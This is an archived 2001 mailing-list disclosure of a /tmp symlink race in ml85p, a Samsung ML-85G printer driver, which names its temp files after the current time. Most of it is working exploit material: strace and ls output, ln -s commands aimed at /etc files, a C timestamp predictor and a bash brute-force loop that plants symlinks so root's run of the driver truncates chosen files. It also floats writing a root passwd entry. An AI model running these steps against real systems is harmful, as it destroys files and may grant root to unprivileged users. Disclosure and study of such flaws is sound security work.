ml85p - driver for Samsung ML-85G GDI printers seems to use /tmp unsecurely.
it seems to use the time() function to determine the /tmp files name.
[root@linux exp]# strings /usr/bin/ml85p | grep tmp
/tmp/ml85g%d
[401070dd] iopl(0x3) = 0
[400cf2bd] time(NULL) = 994462668
[40100cbf] brk(0) = 0x8064544
[40100cbf] brk(0x80646c4) = 0x80646c4
[40100cbf] brk(0x8065000) = 0x8065000
[400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
TIME(2) Linux Programmer's Manual TIME(2)
NAME
time - get time in seconds
SYNOPSIS
#include <time.h>
time_t time(time_t *t);
DESCRIPTION
time returns the time since the Epoch (00:00:00 UTC, January 1, 1970), mea-
sured in seconds.
[d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462666
[d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462667
[d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462668
This is trivial... root must run the following command.
[root@linux exp]# /usr/bin/ml85p -s
-s simulate the printing process, but write the compressed output to a
/tmp/ml85xxxxxxxx file, where the filename suffix is the current time in
time_t units (seconds since 12/31/1970).
as you can see this is the one that hits us...
[400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
oh how nice truncation flag...
O_TRUNC
If the file already exists and is a regular file and the open mode
allows writing (i.e., is O_RDWR or O_WRONLY) it will be truncated to
length 0.
[root@linux exp]# ls -al /tmp | grep ml
-rw-r--r-- 1 root root 0 Jul 6 19:37 ml85g994462665
lrwxrwxrwx 1 d0tslash d0tslash 9 Jul 6 19:37 ml85g994462666 -> /etc/test
lrwxrwxrwx 1 d0tslash d0tslash 9 Jul 6 19:37 ml85g994462667 -> /etc/test
lrwxrwxrwx 1 d0tslash d0tslash 9 Jul 6 19:37 ml85g994462668 -> /etc/test
-rw-r--r-- 1 root root 0 Jul 6 19:37 ml85g994462669
-rw-r--r-- 1 root root 0 Jul 6 19:37 ml85g994462670
[d0tslash@linux d0tslash]$ ls -al /etc/test
-rw-r--r-- 1 root root 0 Jul 6 19:37 /etc/test
I am not sure what other OS's pick for permissions by defualt...
mandrake seems to not allow user access by default ... I don't know
what group you need to have access to use this feature.
[d0tslash@linux d0tslash]$ /usr/bin/ml85p
bash: /usr/bin/ml85p: Permission denied
[d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
-rwsr-x--- 1 root sys 11676 Mar 30 11:43 /usr/bin/ml85p*
for shits and giggles lets see what happens if its got bad perms.
[root@linux exp]# chmod 4755 /usr/bin/ml85p
in which case the results are as follows
[d0tslash@linux d0tslash]$ /usr/bin/ml85p -s (several times)
-rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463605
-rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463607
-rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463608
-rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463609
[d0tslash@linux d0tslash]$ cat ml85p-exp.c
// ln -s /etc/oops /tmp/ml85`./ml85p-exp`
#include <time.h>
#include <stdio.h>
int main(int argc,char **argv)
{
int x = time(NULL);
x = x + 30;
printf("%i\n", x);
}
[d0tslash@linux d0tslash]$ cat ml85p.sh
#!/bin/bash
# krfinisterreat_private
echo "brute.sh <low> <hi>"
L=$1
H=$2
while [ $L -lt $H ]
do
ln -s /etc/oops /tmp/ml85g`./ml85p-exp`
let L=L+1
done
the following file is created.
-rw-r--r-- 1 root d0tslash 0 Jul 6 20:18 /etc/oops
not sure what use this is short of clobbering files... since the output is sent to this file it may be possible to print
owned::0:0:root:/root:/bin/bash to this driver and it may append it to the file in /tmp... I am not sure though... just an idea
-KF
This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 09:45:27 PDT